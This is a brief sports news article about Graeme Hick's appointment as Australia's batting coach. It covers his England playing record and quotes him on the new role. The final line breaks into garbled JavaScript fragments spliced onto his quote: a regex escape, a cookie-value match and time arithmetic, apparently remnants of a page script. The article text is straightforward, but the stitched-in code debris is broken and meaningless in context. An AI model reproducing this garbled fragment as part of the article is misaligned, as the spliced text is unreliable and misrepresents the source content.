Former England batsman Graeme Hick has been named as Australia's new batting coach, after agreeing to a four-year deal.

Hick fills the vacancy created by Michael Di Venuto, who left his role earlier this year.

The 50-year-old has spent the past three years as Cricket Australia's high performance coach, based at Brisbane's National Cricket centre.

He played 65 Test matches for England and 120 ODIs from 1991 to 2001. He scored 3,383 Test runs at an average of 31.32 and 3,846 ODI runs at an average of 37.33, hitting a total of 11 centuries in his international career.

“I have thoroughly enjoyed my current role with Cricket Australia and have worked with some great young up and coming players during my time heading-up the Under-19 program and more recently with the National Performance Squad during the Quadrangular A ODI Series," Hick said.

“To take the next step up with the men’s team and getting the opportunity to work with some of the best players in the world is something I am really looking forward to.” "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
